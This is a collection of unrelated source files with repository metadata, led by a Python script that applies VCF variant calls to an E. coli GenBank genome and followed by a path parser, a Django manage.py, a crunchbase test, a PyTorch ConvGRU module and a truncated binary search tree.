pythonic_start, ref, alt, note)
# Continue to next line.
line = fh.readline()
# def add_cassette_modifications(self, cassette_modifications_csv):
# """Method that allows adding modifications to a cassette relative
# to the starting position of the cassette.
# This might be desired where the cassettes come from some canonical
# source, but in the current context they have modifications.
# Args:
# cassette_modifications_csv: List of modifications to make, described
# with the following columns:
# * cassette_id: Unique id for the cassette as provided in the
# manual updates file.
# * comment
# * position: 1-based index of the mutation start.
# * ref: What was there previously.
# * alt: The alternate value for the position. Currently in
# vcf output format with square brackets.
# """
# with open(variant_data_csv) as csv_fh:
# csv_reader = csv.DictReader(csv_fh)
# for row in csv_reader:
# pass
def update_from_variant_data_csv(self, variant_data_csv):
"""Updates the genome given a list of variants in a csv.
Args:
variant_data_csv: Path to .csv file containing the following cols:
Required:
* position - Position in the starting genome.
* ref - Reference sequence at that position.
* alt - The alternative to replace with.
Optional:
* note - A note to add to the data.
"""
with open(variant_data_csv) as csv_fh:
csv_reader = csv.DictReader(csv_fh)
for row in csv_reader:
pythonic_start = int(row['position']) - 1
ref = row['ref']
# NOTE: Hacky way of parsing that works for the way that
# our particular data looks.
alt = row['alt'][1:-1]
if 'note' in row:
note = row['note']
else:
note = None
# Make the update for this record.
self._update_genome_record_for_variant(
pythonic_start, ref, alt, note=note)
def handle_vcf_record(self, record, sample_index, metadata=None):
"""Decides what to do with a single VCF call.
"""
# The specific sample for this record.
# NOTE: The vcf may have been generated across many samples at the
# same time but this script only operates on a single sample.
sample = record.samples[sample_index]
# If not called, then nothing to do.
if not sample.called:
return False
# Get the reference and alternate for this call.
        # NOTE: We reduce generality from what pyvcf provides since we are
        # dealing with a single sample.
phase_char = sample.gt_phase_char()
alts = sample.gt_bases.split(phase_char)
# TODO: Figure out proper way to handle homozygous vs heterozygous.
# assert len(set(alts)) == 1, (
# "Error while processing %s.\n"
# "We presently only support homozygous calls" %
# (str(record)))
# HACK: For now, if we see a record that we should handle, we
# assume that we should take the first alt that is different than
# the ref.
ref = record.REF
for alt_candidate in alts:
alt = alt_candidate
if alt == ref:
continue
pythonic_position = record.POS - 1
try:
return self._update_genome_record_for_variant(
pythonic_position, ref, alt, metadata=metadata)
            except AssertionError as e:
                raise AssertionError(
                        "AssertionError while fixing record %s\n%s" % (
                                str(record), str(e)))
        # No alt differed from the ref, so there was nothing to change.
        return False
def _update_genome_record_for_variant(self, pythonic_position, ref, alt,
note=None, metadata=None):
"""Updates self.genome_record with the passed in data.
Logic extracted into own method for testing.
"""
ref = ref.upper()
alt = alt.upper()
if ref == alt:
# Nothing to do.
return False
# First, check whether the genome already looks like what it would
# after the variant is fixed. We do this by fake-removing the ref
# and adding the alt.
# NOTE: One specific case that causes this issue is when we are
# manually making the TAG changes before applying the rest of the
# variants called in the VCF. This may bite us down the road, but this
# whole script should probably be re-written in the near future.
first_base_position = (
self.runtime_liftover.convert_source_position_to_target(
pythonic_position, or_next=True))
fake_seq = str(
self.genome_record.seq[:first_base_position] +
alt +
self.genome_record.seq[first_base_position + len(ref):])
if (fake_seq == str(self.genome_record.seq)):
# Nothing to do.
return False
# The reason we don't just switch out the sequence above is that
# we need to get the annotations right.
# NOTE: Or is the above actually a more elegant way to do what follows?
# Now determine the kind of mutation.
if _is_snp(ref, alt):
return self.handle_snp({
'position': pythonic_position,
'ref': ref,
'alt': alt
}, metadata=metadata)
elif _is_deletion(ref, alt):
deleted_subseq = _get_deletion(ref, alt)
deleted_subseq_index_start = ref.rindex(deleted_subseq)
assert len(deleted_subseq) == len(ref) - deleted_subseq_index_start
deleted_subseq_start = (pythonic_position +
deleted_subseq_index_start)
return self.handle_deletion({
'interval': (deleted_subseq_start,
deleted_subseq_start + len(deleted_subseq)),
'validation_seq': deleted_subseq
}, note=note, metadata=metadata)
elif _is_insertion(ref, alt):
insertion_seq = _get_insertion(ref, alt)
alt_insertion_start_index = alt.rindex(insertion_seq)
assert len(insertion_seq) == len(alt) - alt_insertion_start_index, (
"Error handling insertion: ref: %s, alt: %s, position: d" %
(ref, alt, pythonic_position))
insertion_start = pythonic_position + alt_insertion_start_index
return self.handle_insertion({
'position': insertion_start,
'sequence': insertion_seq
}, note=note, metadata=metadata)
else:
# Since we can't exactly tell, just delete ref and insert alt.
validation_seq = str(self.original_genome_record.seq[
pythonic_position:pythonic_position + len(ref)])
self.handle_deletion({
'interval': (pythonic_position,
pythonic_position + len(ref)),
'validation_seq': validation_seq
}, add_annotation=False)
self.handle_insertion({
'position': pythonic_position,
'sequence': alt
}, add_annotation=False)
#### Calculate data for the annotation.
# The source interval is the interval that was removed
# from the source.
source_interval = (pythonic_position, pythonic_position + len(ref))
# The insertion is not mapped in the liftover after the insertion,
# so grab the starting position.
target_genome_start = (
self.runtime_liftover.convert_source_position_to_target(
pythonic_position - 1, or_next=True) + 1)
feature_id = 'misc_variant_source_%d-%d' % source_interval
feature_location = FeatureLocation(
target_genome_start,
target_genome_start + len(alt))
feature = SeqFeature(
type=VARIANT_ANNOTATION_TYPE,
location=feature_location,
strand=1,
id=feature_id
)
if len(ref) <= MAX_REPLACE_CHARS:
feature.qualifiers['replace'] = ref.lower()
else:
feature.qualifiers['replace'] = '%d base replacement' % len(ref)
if note:
feature.qualifiers['note'] = note
if metadata:
for key, value in metadata.iteritems():
if value:
feature.qualifiers[key] = value
add_feature_to_seq_record(self.genome_record, feature)
return True
def handle_snp(self, variant_data, add_annotation=True, note=None,
metadata=None):
"""Handle a single nucleotide position change.
"""
source_snp_position = variant_data['position']
ref_base = variant_data['ref']
alt_base = variant_data['alt']
snp_size = 1
# First, translate the position to the frame of the updated genome.
snp_position = (
self.runtime_liftover.convert_source_position_to_target(
source_snp_position))
        if snp_position is None:
            # Nothing to do. This exact position has probably been deleted.
            # (Check against None explicitly: position 0 is a valid hit.)
return False
# Make sure the ref is what is expected. This is a non-thorough
# but reasonable and bug check.
assert ref_base == self.genome_record.seq[snp_position], (
"Error fixing SNP at "
"source position %d, "
"target position %d, "
"Expected: %s, observed: %s" % (
source_snp_position, snp_position, ref_base,
self.genome_record.seq[snp_position]))
new_seq = (
self.genome_record.seq[:snp_position] +
alt_base +
self.genome_record.seq[snp_position + 1:])
self.genome_record.seq = new_seq
if add_annotation:
# Add feature marking SNP.
snp_feature_location = FeatureLocation(
snp_position, snp_position + snp_size)
snp_feature_id = 'snp_source_%d_%s_to_%s' % (
source_snp_position, ref_base, alt_base)
snp_feature = SeqFeature(
type=VARIANT_ANNOTATION_TYPE,
location=snp_feature_location,
strand=1,
id=snp_feature_id
)
snp_feature.qualifiers['replace'] = ref_base.lower()
if note:
snp_feature.qualifiers['note'] = note
if metadata:
for key, value in metadata.iteritems():
if value:
snp_feature.qualifiers[key] = value
add_feature_to_seq_record(self.genome_record, snp_feature)
        # Change was made.
return True
def handle_insertion(self, variant_data, add_annotation=True, note=None,
metadata=None):
"""Handles an insertion at the position relative to the original
genome.
Args:
variant_data: Dictionary with keys:
* position: Pythonic position for the insertion relative
to the original genome record.
* sequence: The sequence being inserted. One or more bases.
"""
source_position = variant_data['position']
seq = variant_data['sequence']
# First, translate the position to the frame of the updated genome.
target_genome_position = (
self.runtime_liftover.convert_source_position_to_target(
source_position, or_next=True))
# Insert the sequence at the provided position.
insert_sequence_and_update_features(self.genome_record, seq,
target_genome_position, extend_feature_ends=True)
# Update the liftover interval mapping.
self.runtime_liftover.handle_insertion(variant_data)
if add_annotation:
# Add a feature annotating the insertion.
feature_id = 'insertion_source_%s' % (source_position,)
feature_location = FeatureLocation(target_genome_position,
target_genome_position + len(seq))
feature = SeqFeature(
type=VARIANT_ANNOTATION_TYPE,
location=feature_location,
strand=1,
id=feature_id
)
# TODO: This doesn't work with the .tbl format.
# Figure out how to fix this.
# feature.qualifiers['replace'] = ''
if note:
feature.qualifiers['note'] = note
if metadata:
for key, value in metadata.iteritems():
if value:
feature.qualifiers[key] = value
add_feature_to_seq_record(self.genome_record, feature)
        # Change was made.
return True
def handle_deletion(self, variant_data, add_annotation=True, note=None,
metadata=None):
"""Handles a deletion.
After this operation, the genome_record reflects the deletion.
Args:
variant_data: Dictionary with keys:
* interval: A two-tuple representing pythonic interval for the
deletion, i.e. (inclusive_start, exclusive_end).
e.g. (100, 102) is a deletion of the 2 bases at positions
100 and 101.
* validation_seq: If provided, used to validate that the
interval being deleted is this sequence.
"""
interval = variant_data['interval']
# Inclusive-bounds interval for the target.
target_genome_interval = [
self.runtime_liftover.convert_source_position_to_target(
bound, or_next=True)
for bound in (interval[0], interval[1] - 1)]
assert (bases_in_interval(target_genome_interval) ==
interval[1] - interval[0])
target_genome_interval_pythonic = (
target_genome_interval[0],
target_genome_interval[1] + 1)
delete_interval(self.genome_record, target_genome_interval_pythonic,
validation_seq=variant_data.get('validation_seq', None))
# Update the liftover mapping.
self.runtime_liftover.handle_deletion({
'interval': interval
})
if add_annotation:
# Add a feature annotating the deletion.
# Calculate the target genome interval for the annotation.
# Annotate from the position before the deletion to the position
# after.
target_genome_interval_after_deletion = [
self.runtime_liftover.convert_source_position_to_target(
bound, or_next=True)
for bound in (interval[0] - 1, interval[1])]
feature_id = 'deletion_source_%d-%d' % (
interval[0], interval[1])
feature_location = FeatureLocation(
target_genome_interval_after_deletion[0],
target_genome_interval_after_deletion[1])
feature = SeqFeature(
type=VARIANT_ANNOTATION_TYPE,
location=feature_location,
strand=1,
id=feature_id
)
ref = variant_data.get('validation_seq', '')
if len(ref) <= MAX_REPLACE_CHARS:
feature.qualifiers['replace'] = ref.lower()
else:
feature.qualifiers['replace'] = '%d base deletion' % len(ref)
feature.qualifiers['source_deletion_interval'] = str(interval)
if note:
feature.qualifiers['note'] = note
if metadata:
for key, value in metadata.iteritems():
if value:
feature.qualifiers[key] = value
add_feature_to_seq_record(self.genome_record, feature)
        # Change was made.
return True
###############################################################################
# Main procedure entrypoint
###############################################################################
def run(original_genbank_path, output_root, vcf_path, sample_id,
**kwargs):
"""Creates a modified genbank file starting from the original genbank
and applying the changes indicated in the vcf file.
Args:
original_genbank_path: Path to the original genbank file.
output_root: Root of filename, without extension. The extension
will be appended to the name depending on the output type.
vcf_path: Path to the vcf file.
        sample_id: Id of the target sample in the vcf, e.g. recoli_misq_c31_321D.
kwargs: Optional keyword args. Supported keys:
* liftover_pickle_dest: The output file to write the pickled
liftover interval mapping to.
* output_format: One of 'fasta' or 'genbank'. Defaults to
'genbank'.
* variant_data_csv: If included, will use
update_from_variant_data_csv() rather than standard run.
* verbose: Toggle for amount of informative print statements during
processing.
Returns:
The final SeqRecord that was also written to output.
"""
# Strategy:
# Iterate through the calls in the VCF file and incrementally
# update the genome record. There are tricky subtleties including:
# * The frame of the target genome is constantly changing.
# Nuances: When adding insertions/deletions, this may shift the overall
# frame of the genome downstream from that particular position. We need a
# liftover-like intermediate representation that allows us
# to keep track of these accumulated shifts. For example, every successive
# change that we want to make should have its position updated using
# this method. That way, the annotation can potentially preserve the
# position of the SNP relative to the original record, but we can
# introduce the changes into the underlying sequence and update all
# features appropriately.
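    # Illustrative example: after a 2-base insertion at source position 100,
    # a SNP called at source position 150 must be written at target position
    # 152; RuntimeLiftover tracks exactly these accumulated offsets.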
if isinstance(original_genbank_path, SeqRecord):
genome_record = original_genbank_path
else:
# Read in the original genome.
genome_record = SeqIO.read(original_genbank_path, 'genbank')
# Get optional manual updates file.
if 'manual_updates_filepath' in kwargs:
manual_updates_filepath = kwargs['manual_updates_filepath']
else:
manual_updates_filepath = None
# Create the object that encapsulates most of the calculation.
vcf_to_genbank_maker = VCFToGenbankMaker(genome_record, vcf_path,
sample_id, manual_updates_filepath)
if 'variant_data_csv' in kwargs:
vcf_to_genbank_maker.update_from_variant_data_csv(
kwargs['variant_data_csv'])
else:
vcf_to_genbank_maker.run(
verbose=kwargs.get('verbose', False),
log_file=kwargs.get('log_file', None))
# Write the final result.
DEFAULT_OUTPUT_FORMAT = 'genbank'
output_format = kwargs.get('output_format', DEFAULT_OUTPUT_FORMAT)
output_path = output_root + '.' + output_format
SeqIO.write(genome_record, output_path, output_format)
# Optional: Pickle the liftover interval mappings.
if 'liftover_pickle_dest' in kwargs:
vcf_to_genbank_maker.runtime_liftover.pickle_interval_mapping(
kwargs['liftover_pickle_dest'])
return genome_record
###############################################################################
# Helpers to evaluate SNP type.
###############################################################################
def _is_snp(ref, alt):
return len(ref) == 1 and alt in ['A', 'T', 'G', 'C']
def _is_deletion(ref, alt):
return _get_deletion(ref, alt) is not None
def _get_deletion(ref, alt):
"""Extracts the portion of ref that is deleted relative to alt.
Returns None if no valid deletion found.
"""
if len(ref) <= len(alt):
return None
if len(alt) == 0:
return ref
# Make sure they are both uppercase for matching procedure below.
ref = ref.upper()
alt = alt.upper()
# Step through the two simultaneously until the first mismatch.
idx = 0
while idx < len(alt):
if ref[idx] != alt[idx]:
break
idx += 1
if idx < len(alt):
        # Our definition of deletion requires the entire alt to be matched.
return None
deletion = ref[idx:]
if not deletion:
return None
return deletion
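# Illustrative examples: _get_deletion('ACGT', 'AC') == 'GT' (the suffix
# 'GT' was deleted), while _get_deletion('ACGT', 'AG') is None because the
# alt is not a prefix of the ref.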
def _is_insertion(ref, alt):
return _get_insertion(ref, alt) is not None
def _get_insertion(ref, alt):
"""Extracts the portion of alt that inserted relative to alt.
"""
# Just call _get_deletion with params reversed.
return _get_deletion(alt, ref)
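# Illustrative example: _get_insertion('A', 'ACG') == 'CG', i.e. 'CG' was
# inserted after the shared prefix 'A'.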
###############################################################################
# Other utility methods
###############################################################################
def create_filtered_vcf(vcf_path, out_vcf_path, csv_with_pos_to_keep):
"""Filters the passed in vcf down to the variant calls that we actually
want to add to the updated genbank file.
Writes the results to out_vcf_path.
    The reason for this method, which cleans up the vcf rather than just
    using the csv directly, is that the logic for going from vcf to genbank
    will hopefully be re-usable, so we might as well take a first stab at it
    here.
"""
# Positions uniquely identify SNPs (manually confirmed). The provided
# csv file should only have SNPs that we are keeping.
positions_to_keep = set([])
with open(csv_with_pos_to_keep) as csv_fh:
csv_reader = csv.DictReader(csv_fh)
for row in csv_reader:
positions_to_keep.add(int(row['POS']))
    # Now create a filtered vcf with only the above positions.
with open(vcf_path) as vcf_fh, open(out_vcf_path, 'w') as out_vcf_fh:
vcf_reader = vcf.Reader(vcf_fh)
vcf_writer = vcf.Writer(out_vcf_fh, vcf_reader)
for record in vcf_reader:
if record.POS in positions_to_keep:
vcf_writer.write_record(record)
def add_TAG_annotations(genome_record):
"""Temporary method for adding our UAG mutations manually.
Mutates the passed in genome_record by adding features for the
amber SNPs.
"""
TAG_ANNOTATION_TYPE = VARIANT_ANNOTATION_TYPE
UAG_LOCATIONS_FILE = os.path.join(
GENOMES_DIR, 'mg1655', 'mg1655_uag_locations.csv')
# Import the list of UAG locations and make the positions 0-indexed
# to be consistent with the BioPython convention.
uag_location_list = []
with open(UAG_LOCATIONS_FILE) as fh:
fh.readline() # Drop the first line
for line in fh.readlines():
uag_location_list.append(int(line.strip()) - 1)
uag_location_list = sorted(uag_location_list)
for current_uag_position in uag_location_list:
current_base = genome_record.seq[current_uag_position]
if current_base == 'G':
alt_base = 'A'
feature_location = FeatureLocation(
current_uag_position - 2,
current_uag_position + 1)
feature_strand = 1
elif current_base == 'C':
alt_base = 'T'
feature_location = FeatureLocation(
current_uag_position,
current_uag_position + 3)
feature_strand = -1
else:
raise AssertionError("Invalid base at position %d: %s" % (
current_uag_position, current_base))
# Update the sequence.
new_seq = (
genome_record.seq[:current_uag_position] +
alt_base +
genome_record.seq[current_uag_position + 1:])
genome_record.seq = new_seq
# Add a feature annotation.
feature_id = 'remove_uag_%d' % current_uag_position
feature = SeqFeature(
type=TAG_ANNOTATION_TYPE,
location=feature_location,
strand=feature_strand,
id=feature_id
)
feature.qualifiers['replace'] = 'tag'
feature.qualifiers['note'] = 'Reassigning UAG'
add_feature_to_seq_record(genome_record, feature)
def get_vcf_metadata():
"""Returns a dictionary with keys being SNP positions and values
being the data from DBG's analysis with SnpEFF etc.
"""
VARIANT_METADATA = os.path.join(REC1_C321D_ROOT, 'rec1_c321d_snps.csv')
position_to_data_map = {}
with open(VARIANT_METADATA) as csv_fh:
csv_reader = csv.DictReader(csv_fh)
for row in csv_reader:
position_to_data_map[int(row['POS'])] = {
'EFF_AA': row['EFF_AA'],
'EFF_CODON': row['EFF_CODON'],
'EFF_FUNC': row['EFF_FUNC'],
'EFF_SEV': row['EFF_SEV'],
}
return position_to_data_map
###############################################################################
# Testing and scripting
###############################################################################
if __name__ == '__main__':
MG1655_GENBANK = os.path.join(GENOMES_DIR, 'mg1655', 'mg1655.genbank')
RECOLI_ALL_SNPS = os.path.join(REC1_C321D_ROOT, 'recoli_all_snps.vcf')
C321D_SNPS_VCF = os.path.join(REC1_C321D_ROOT, 'rec1_c321d_snps.vcf')
REC1_C321D_SAMPLE_ID = 'recoli_misq_c31_321D'
REC1_C321D_OUTPUT_ROOT = os.path.join(REC1_C321D_ROOT, 'rec1_c321d')
REC1_C321D_PRELIM_OUTPUT_ROOT = os.path.join(REC1_C321D_ROOT,
'rec1_c321d.preliminary')
PICKLE_DEST = os.path.join(REC1_C321D_ROOT, 'rec1_c321d_liftover.pickle')
MANUAL_UPDATES = os.path.join(REC1_C321D_ROOT, 'rec1_c321d_manual_fixes.txt')
# # First filter the edits that we actually want to keep.
# # TODO: Make the run() method take as an optional argument a user-specified
# # argument for filtering which vcf rows are incorporated into the Genbank.
# CSV_WITH_POS_TO_KEEP = os.path.join(REC1_C321D_ROOT, 'rec1_c321d_snps.csv')
# create_filtered_vcf(RECOLI_ALL_SNPS, C321D_SNPS_VCF, CSV_WITH_POS_TO_KEEP)
# Now run the genbank creator.
kwargs = {
'liftover_pickle_dest': PICKLE_DEST,
'manual_updates_filepath': MANUAL_UPDATES,
'output_format': 'genbank',
'verbose': True
}
run(MG1655_GENBANK, REC1_C321D_OUTPUT_ROOT, C321D_SNPS_VCF,
REC1_C321D_SAMPLE_ID, **kwargs)
### Developing manual updates
# REC1_C321D_MANUAL_ONLY_OUT = os.path.join(REC1_C321D_ROOT,
# 'rec1_c321d_manual_only.genbank')
# genome_record = SeqIO.read(MG1655_GENBANK, 'genbank')
# vcf_to_genbank_maker = VCFToGenbankMaker(genome_record, None,
# None, MANUAL_UPDATES)
# vcf_to_genbank_maker.handle_manual_updates()
# SeqIO.write(genome_record, REC1_C321D_MANUAL_ONLY_OUT, 'genbank')
### Developing chain file output.
# runtime_liftover = RuntimeLiftover(genome_record)
# runtime_liftover.pickle_interval_mapping(PICKLE_DEST)
# print runtime_liftover._interval_mapping
# CHAIN_FILE_DEST = os.path.join(GENOMES_DIR, 'mg1655.to.rec1_c321d.chain')
# runtime_2 = RuntimeLiftover.from_pickled_intervals(
# [], PICKLE_DEST)
# runtime_2.write_chain_file(CHAIN_FILE_DEST)
### Generating source genome positions for c321D Genbank SNPs
# OUT_CSV_FIELD_NAMES = ['position', 'ref', 'alt', 'mg1655_position']
# REALIGNED_SNPS_IN = os.path.join(REC1_C321D_ROOT, 'realignment_snps.csv')
# REALIGNED_SNPS_WITH_MG1655_POS = os.path.join(
# REC1_C321D_ROOT, 'realignment_snps_with_mg1655_positions.csv')
# MG1655_GENOME_RECORD = SeqIO.read(MG1655_GENBANK, 'genbank')
# runtime_liftover_obj = RuntimeLiftover.from_pickled_intervals(
# MG1655_GENOME_RECORD, PICKLE_DEST)
# with open(REALIGNED_SNPS_WITH_MG1655_POS, 'w') as out_csv_fh:
# csv_writer = csv.DictWriter(out_csv_fh, OUT_CSV_FIELD_NAMES)
# csv_writer.writeheader()
# with open(REALIGNED_SNPS_IN) as in_csv_fh:
# csv_reader = csv.DictReader(in_csv_fh)
# for row in csv_reader:
# out_row = copy.copy(row)
# # Convert the position. Note the indexing correction.
# c321d_position_pythonic = int(row['position']) - 1
# mg1655_position_pythonic = (
# runtime_liftover_obj.convert_target_position_to_source(
# c321d_position_pythonic))
# if mg1655_position_pythonic is not None:
# # Validation check that the base at that position is
# # correct.
# assert row['ref'][0] == (
# runtime_liftover_obj.source_genome_record.seq[
# mg1655_position_pythonic])
# # Make the position one-indexed to be consistent
# # with the vcf standard.
# mg1655_position = mg1655_position_pythonic + 1
# else:
# mg1655_position = None
# out_row['mg1655_position'] = mg1655_position
# csv_writer.writerow(out_row)
|
[
"gleb.kuznetsov@gmail.com"
] |
gleb.kuznetsov@gmail.com
|
4dece3a51ef8582eafceddbded3f01a224ed82da
|
fd163cf66c9628c3ec626336ceb189336742a973
|
/pathparser.py
|
77e2dcedf816272b3b2a8c35fef25b1228e3cf0d
|
[] |
no_license
|
wmatous/tripserver
|
4fc0d12a3613e0b7eef3dfb036379f3ca14e1bff
|
e66676bf2dd7beb775ee02bcc5946ce07cc49f48
|
refs/heads/master
| 2020-03-21T21:45:22.548694
| 2018-08-01T22:35:54
| 2018-08-01T22:35:54
| 139,082,295
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 179
|
py
|
#!/usr/bin/python
class PathParser:
    def __init__(self, path=None):
        self.path = path
        # Split on '/' and drop the empty leading component
        # (assumes an absolute path such as '/a/b').
        self.components = (path or '').split('/')
        del self.components[0]
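# Usage sketch (illustrative):
#   PathParser('/trips/42').components == ['trips', '42']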
|
[
"willmatous@gmail.com"
] |
willmatous@gmail.com
|
600d33c5a07fa4f35b148663638b84c707914e99
|
3af8e245768ed96263210b532eaa32defc427138
|
/SI 206 Discussion/discussion.py
|
8de2c25ba39834e9cbc092041ba9cf8126bbd66d
|
[] |
no_license
|
hanacoon1/OLD-hanacoon.github.io
|
083ec0cb0bddfdb9038e18bc89a71e334f545e7b
|
7e32b57def7991c3e18ee391c8a7e5219aca344a
|
refs/heads/master
| 2020-12-23T10:29:44.650593
| 2018-12-27T01:42:34
| 2018-12-27T01:42:34
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 15
|
py
|
asldkfjalsdkfj
|
[
"hanacoon@Hanas-MacBook-Pro-2.local"
] |
hanacoon@Hanas-MacBook-Pro-2.local
|
81d343fe13a8e35e1122f366e78878bab4d952e7
|
8a3401fcc24fb398e7cac0f8a67e132ed5b3fa8f
|
/tests/test_person.py
|
43307a82a22e73117afeea3e18ab139709902ab1
|
[
"MIT"
] |
permissive
|
ngzhian/pycrunchbase
|
58cf96ed20b5b3f4861bb884bcf0d9ffcf4df808
|
ead7c93a51907141d687da02864a3803d1876499
|
refs/heads/master
| 2023-07-08T06:18:59.314695
| 2023-07-03T13:27:06
| 2023-07-03T13:27:06
| 30,629,033
| 69
| 45
|
MIT
| 2020-12-02T02:26:40
| 2015-02-11T03:39:14
|
Python
|
UTF-8
|
Python
| false
| false
| 1,950
|
py
|
from datetime import datetime
from unittest import TestCase
from pycrunchbase import Person
PERSON_DATA = {
"uuid": "uuid",
"type": "Person",
"properties": {
"permalink": "first-last",
"last_name": "Last",
"first_name": "First",
"bio": "Bio",
"role_investor": True,
"born_on": "2000-01-02",
"born_on_trust_code": 7,
"is_deceased": False,
"died_on": None,
"died_on_trust_code": 0,
"created_at": 1233271545,
"updated_at": 1419596914,
},
"relationships": {
"news": {
"cardinality": "OneToMany",
"paging": {
"total_items": 2,
"first_page_url": "https://api.crunchbase.com/v3.1/person/first-last/news",
"sort_order": "created_at DESC"
},
"items": [
{
"url": "http://example.com/news_1/",
"author": "Author 1",
"posted_on": "2012-12-28",
"type": "PressReference",
"title": "Title 1",
"created_at": 1356743058,
"updated_at": 2012
},
{
"url": "example.com/news_2/",
"author": "Author 2",
"posted_on": "2012-04-20",
"type": "PressReference",
"title": "Title 2",
"created_at": 1334962777,
"updated_at": 2012
},
]
}
}
}
class PersonTestCase(TestCase):
def test_properties(self):
person = Person(PERSON_DATA)
self.assertEqual(person.permalink, 'first-last')
self.assertEqual(person.last_name, 'Last')
self.assertEqual(person.first_name, 'First')
self.assertEqual(person.bio, 'Bio')
self.assertEqual(person.role_investor, True)
self.assertEqual(person.born_on, datetime(2000, 1, 2))
self.assertEqual(person.born_on_trust_code, 7)
self.assertEqual(person.is_deceased, False)
self.assertEqual(person.died_on, None)
self.assertEqual(person.died_on_trust_code, 0)
def test_relationships(self):
person = Person(PERSON_DATA)
self.assertIsNotNone(person.news)
self.assertEqual(2, len(person.news))
|
[
"ngzhian@gmail.com"
] |
ngzhian@gmail.com
|
e8b2a16914817ae9b23bf9c87e2185ba2d4b38bd
|
0c65188b6ce915faa043e7d60415fd04c3185374
|
/socketL/zhangll/client/reader.py
|
d15fa962efc126eb81d6f24d67cc128b7bfbe8b0
|
[
"Apache-2.0"
] |
permissive
|
MaochengXiong/PythonLearning
|
1366eaf1994376422fe70fe2dc4203f4273e3911
|
2b57df0a4e58fd8ea070bb32e48aa6c1e6f62204
|
refs/heads/main
| 2023-07-10T21:31:28.842146
| 2021-07-30T02:33:44
| 2021-07-30T02:33:44
| 388,382,433
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 559
|
py
|
import threading
import json
import status
class Reader(threading.Thread):
def __init__(self, threadId, socket):
threading.Thread.__init__(self)
self.threadId = threadId
self.socket = socket
def run(self):
while True:
receivedBytes = self.socket.recv(1024)
print(str(receivedBytes))
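            # Note: this assumes each recv() yields exactly one complete JSON
            # message; TCP itself provides no such framing guarantee.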
receivedJson = json.loads(receivedBytes)
code = receivedJson['code']
if code == 3 or code == 5:
status.status = True
print(receivedJson['data'])
|
[
"413700858@qq.com"
] |
413700858@qq.com
|
a92c79b50b41a77df516f9358f62fae691ecf9f4
|
5fa1737735944bf1e6809c7dd0249b0d0c3edf01
|
/manage.py
|
e80f2118c62ac199c9ad644f51999e85f1a1449a
|
[] |
no_license
|
asb404/asb_event
|
ceb8c836093122bbcee975bb1685d24670883349
|
32c30fbb7a305ba82d2d8b1b529da13e209376ca
|
refs/heads/main
| 2023-04-03T04:39:31.805775
| 2021-03-26T19:59:40
| 2021-03-26T19:59:40
| 351,891,863
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 624
|
py
|
#!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'asb1.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
if __name__ == '__main__':
main()
|
[
"seeantara@yahoo.com"
] |
seeantara@yahoo.com
|
32f93d2676d08d0f9e28163d5392efbfd5c00aa2
|
724a171bbfea28efded7290adfa11d59e13e96af
|
/droid_slam/modules/gru.py
|
84ea5038fb45bbe8cfd92428d04ce5612d74d43a
|
[
"BSD-3-Clause"
] |
permissive
|
haleqiu/DROID-SLAM
|
f3f2a1fd8dd640f4d41354ddc14a1d997f061558
|
b7e09308d7672d22b28cd23ed401e2b4a4b9bf8d
|
refs/heads/main
| 2023-08-23T06:15:56.626593
| 2021-10-12T19:37:50
| 2021-10-12T19:37:50
| 416,453,062
| 0
| 0
|
BSD-3-Clause
| 2021-10-12T18:29:48
| 2021-10-12T18:29:48
| null |
UTF-8
|
Python
| false
| false
| 1,229
|
py
|
import torch
import torch.nn as nn
class ConvGRU(nn.Module):
def __init__(self, h_planes=128, i_planes=128):
super(ConvGRU, self).__init__()
self.do_checkpoint = False
self.convz = nn.Conv2d(h_planes+i_planes, h_planes, 3, padding=1)
self.convr = nn.Conv2d(h_planes+i_planes, h_planes, 3, padding=1)
self.convq = nn.Conv2d(h_planes+i_planes, h_planes, 3, padding=1)
self.w = nn.Conv2d(h_planes, h_planes, 1, padding=0)
self.convz_glo = nn.Conv2d(h_planes, h_planes, 1, padding=0)
self.convr_glo = nn.Conv2d(h_planes, h_planes, 1, padding=0)
self.convq_glo = nn.Conv2d(h_planes, h_planes, 1, padding=0)
def forward(self, net, *inputs):
inp = torch.cat(inputs, dim=1)
net_inp = torch.cat([net, inp], dim=1)
b, c, h, w = net.shape
glo = torch.sigmoid(self.w(net)) * net
glo = glo.view(b, c, h*w).mean(-1).view(b, c, 1, 1)
z = torch.sigmoid(self.convz(net_inp) + self.convz_glo(glo))
r = torch.sigmoid(self.convr(net_inp) + self.convr_glo(glo))
q = torch.tanh(self.convq(torch.cat([r*net, inp], dim=1)) + self.convq_glo(glo))
net = (1-z) * net + z * q
return net
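

# Usage sketch (illustrative, not part of the original module): assumes
# PyTorch is available and runs one ConvGRU update on random tensors with
# arbitrary shapes.
if __name__ == '__main__':
    gru = ConvGRU(h_planes=128, i_planes=128)
    net = torch.randn(2, 128, 30, 40)  # hidden state, (B, C, H, W)
    inp = torch.randn(2, 128, 30, 40)  # input feature map
    out = gru(net, inp)
    print(out.shape)  # torch.Size([2, 128, 30, 40])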
|
[
"zachteed@gmail.com"
] |
zachteed@gmail.com
|
0571408767d239295a03e1f48643a782532e67d4
|
51d4bc60aa2c24c92eb01f5c32eecf2ca0b50640
|
/DSA/binary_tree.py
|
9f33d251f2de3bdd2f7320010e3554c2a385a2bf
|
[] |
no_license
|
kamleshkalsariya/Python_basic
|
be3d090b1b88e761a438fdd4db9926b306f000c8
|
b7292166316f4455e0bb4e47afc61a9341602874
|
refs/heads/main
| 2023-08-18T13:57:44.128992
| 2021-10-13T12:21:41
| 2021-10-13T12:21:41
| 375,887,399
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,672
|
py
|
class BinarySearchTreeNode:
def __init__(self, data):
self.data = data
self.left = None
self.right = None
def add_child(self, data):
if data == self.data:
            return  # node already exists
if data < self.data:
if self.left:
self.left.add_child(data)
else:
self.left = BinarySearchTreeNode(data)
else:
if self.right:
self.right.add_child(data)
else:
self.right = BinarySearchTreeNode(data)
def search(self, val):
if self.data == val:
return True
if val < self.data:
if self.left:
